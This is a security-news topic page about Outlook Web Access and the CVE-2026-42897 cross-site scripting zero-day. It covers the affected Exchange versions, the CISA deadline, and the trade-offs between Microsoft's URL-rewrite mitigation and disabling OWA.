Outlook Web Access
The browser-based email interface for Microsoft Exchange Server; targeted by the CVE-2026-42897 cross-site scripting zero-day in May 2026.
Last refreshed: 20 May 2026 · Appears in 1 active topic
With no Exchange patch before 29 May, should organisations disable OWA entirely?
Timeline for Outlook Web Access
Exchange repeats the CISA deadline-before-patch trap
Cybersecurity: Threats and DefencesMentioned in: Patch Tuesday clean streak hides out-of-band KEVs
Cybersecurity: Threats and Defences- What is Outlook Web Access and how does the CVE-2026-42897 attack work?
- OWA is Exchange Server's browser-based mail interface. CVE-2026-42897 is a cross-site scripting flaw that lets an attacker inject malicious script into the OWA session, potentially stealing session tokens or credentials. CVSS 8.1.Source: Microsoft Security Response Center
- Is Exchange Online affected by the CVE-2026-42897 OWA zero-day?
- No. CVE-2026-42897 affects on-premises Exchange Server 2016, 2019, and Subscription Edition only. Exchange Online (Microsoft 365) is not affected.Source: Microsoft Security Response Center
- Should we disable OWA to protect against CVE-2026-42897?
- Disabling OWA eliminates the attack surface but removes a primary remote-access channel. The alternative is the EEMS URL-rewrite mitigation, which breaks calendar printing, OWA Light mode, and inline images. Federal agencies face a 29 May deadline either way.Source: CISA KEV / Help Net Security
- What are XSS attacks and why are they dangerous in a mail client?
- Cross-site scripting (XSS) attacks inject malicious script into trusted web pages. In a mail client like OWA, this can steal session cookies, impersonate users, or redirect victims to attacker-controlled sites — all without the attacker needing the user's password.
Background
Outlook Web Access (OWA) is the browser-based email client built into Microsoft Exchange Server, allowing users to access mailboxes, calendars, and contacts from any web browser without a local mail client. In May 2026, OWA became the attack surface for CVE-2026-42897, a cross-site scripting (XSS) zero-day rated CVSS 8.1, added to CISA's Known Exploited Vulnerabilities catalogue on 15 May 2026 with a 29 May federal deadline. Microsoft has not shipped a patch. In an XSS attack, a threat actor injects malicious script into the web interface that executes in a victim's browser, enabling session-token theft, credential capture, or redirects to attacker-controlled infrastructure. Active exploitation against on-premises Exchange Server 2016, 2019, and Subscription Edition is confirmed; the cloud-hosted Exchange Online service is unaffected.
OWA was introduced with Exchange 2000 Server and has served as the de facto remote-access method for enterprises unwilling or unable to deploy VPN-based Outlook connectivity. Its browser-rendered interface makes it particularly sensitive to XSS flaws, as the trusted execution environment is the end-user's session cookie rather than a native application's credential store.
Microsoft's only sanctioned mitigation for CVE-2026-42897 is an Exchange Emergency Mitigation Service URL-rewrite rule applied via the EEMS framework. The rule carries documented side effects: the OWA calendar print function stops working, inline images may fail to render, and OWA Light mode breaks entirely. Organisations disabling OWA to eliminate the attack surface lose a primary remote-access channel, leaving CISOs to weigh user-experience degradation against confirmed exploitation risk in the fourteen days before the CISA deadline.